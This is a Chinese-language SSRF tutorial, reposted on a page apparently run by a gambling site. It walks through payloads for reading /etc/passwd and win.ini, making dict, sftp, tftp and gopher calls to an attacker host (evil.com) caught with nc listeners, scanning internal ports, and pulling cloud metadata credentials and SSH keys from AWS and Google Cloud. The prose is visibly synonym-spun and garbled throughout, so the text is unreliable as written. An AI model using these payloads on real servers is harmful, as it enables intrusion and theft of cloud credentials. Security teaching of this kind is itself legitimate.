SSRF-服务器端需求制作(样品和应用要点)第1部分 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

SSRF-服务器端需求制作(样品和应用要点)第1部分

申博_行业观察 申博 184次浏览 已收录 0个评论

甚么是SSRF?
SSRF是指进击者从一个具有漏洞的web运用中发送的一个捏造的请求的进击。
起首引见一种简朴的体式格局以—-进击者请求效劳器为他猎取一个URL
比方

GET /?url=http://google.com/ HTTP/1.1
Host: example.com

在这里,example.com从它的效劳器猎取

SSRF-服务器端需求制作(样品和应用要点)第1部分

目次

1.SSRF的范例
2.测试用例
3.绕过白名单和黑名单
4.实例

1.SSRF的范例
i. 显现对进击者的相应(Basic)
ii.不显现相应(Blind)

i.Basic
如前所述,它显现对进击者的相应,因此在效劳器猎取进击者请求的URL后,它将把相应发送回进击者。
DEMO(运用Ruby)。
装置以下包并运转代码
gem install sinatra

require 'sinatra'
require 'open-uri'

get '/' do
  format 'RESPONSE: %s', open(params[:url]).read
end

上面的代码将翻开当地效劳器端口4567(取自Jobert的POST)

我们能够用SSRF做些甚么?
SSRF到反射XSS
实验应用URL接见内部资本并使效劳器实行操纵
(file:///, dict://, ftp://, gopher://..)
我们能够扫描内部收集和端口
若是它在云实例上运转,则实验猎取元数据
只需从具有内容范例为html的歹意payload的外部站点猎取文件。
测试URL形式 –
当我们发明ssrf时,起首要做的是测试一切事情一般的包装器。

file:///
dict://
sftp://
ldap://
tftp://
gopher://

file:// –

File是用来从文件体系猎取文件

http://example.com/ssrf.php?url=file:///etc/passwd
http://example.com/ssrf.php?url=file:///C:/Windows/win.ini

若是效劳器阻挠对外部站点或白名单的http请求,您能够简朴地运用以下URL形式来发出请求:
dict:// –
DICT URL计划用于透露表现运用DICT协定可用的界说或单词列表:

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

http://example.com/ssrf.php?dict://evil.com:1337/

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 31126)
CLIENT libcurl 7.40.0

sftp:// –
Sftp代表SSH文件传输协定,或平安文件传输协定,是SSH的内含协定,在平安连接上与SSH相似。

http://example.com/ssrf.php?url=sftp://evil.com:1337/

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 37146)
SSH-2.0-libssh2_1.4.2

ldap:// or ldaps:// or ldapi:// –
LDAP代表轻量级目次接见协定。它是一种经由过程IP收集治理和接见分布式目次信息效劳的运用协定。

http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit

tftp:// –
简朴文件传输协定是一种简朴的锁步文件传输协定,它许可客户端从长途主机猎取文件或将文件放到长途主机上。

http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET

evil.com:# nc -lvup 1337
Listening on [0.0.0.0] (family 0, port 1337)
TESTUDPPACKEToctettsize0blksize512timeout3

gopher:// –
Gopher是一种分布式的文档通报效劳。它许可用户以无缝的体式格局探究、搜刮和检索驻留在分歧地位的信息。

http://example.com/ssrf.php?url=http://attacker.com/gopher.php
gopher.php (host it on acttacker.com):-
<?php
   header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');
?>

evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 49398)
Hi
ssrf
test

更多信息请参阅此处
扫描内部收集和端口 –
若是他们在局域网中运转某些效劳器(Kibana,Elastic Search,MongoDB ……)会如何
因为防火墙的限定,我们不克不及直接从互联网上接见。

SSRF-服务器端需求制作(样品和应用要点)第1部分
我们运用SSRF接见它们。

进击者运转内部IP和端口扫描,相识有关目的的更多信息,并将其用于进一步进击。

这有时会致使长途代码实行。
好比 发明了一个内部主机,其运转了一个人尽皆知的具有RCE的过期软件,我们能够在这里运用它来实行代码,关于其他漏洞也是云云。

云实例

Amazon:
若是您在Amazon Cloud中发明SSRF,, Amazon将公然一个内部效劳,每一个EC2实例都能够查询关于主机的实例元数据。若是您发明在EC2上运转的SSRF漏洞,请实验请求:

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance

这将为我们供应很雄厚的信息,如Aws密钥、ssh密钥
请参阅POC- #285380, #53088
比方:-
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/[INJECTION PAYLOAD]
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
Google Cloud –
谷歌也一样。

http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json

进一步应用能够致使实例接受。
参阅 # 341876
Digital Ocean –
关于元数据的概述
http://169.254.169.254/metadata/v1.json
关于其他云实例,您能够参考此处
./第1局部完毕。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明SSRF-服务器端需求制作(样品和应用要点)第1部分
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址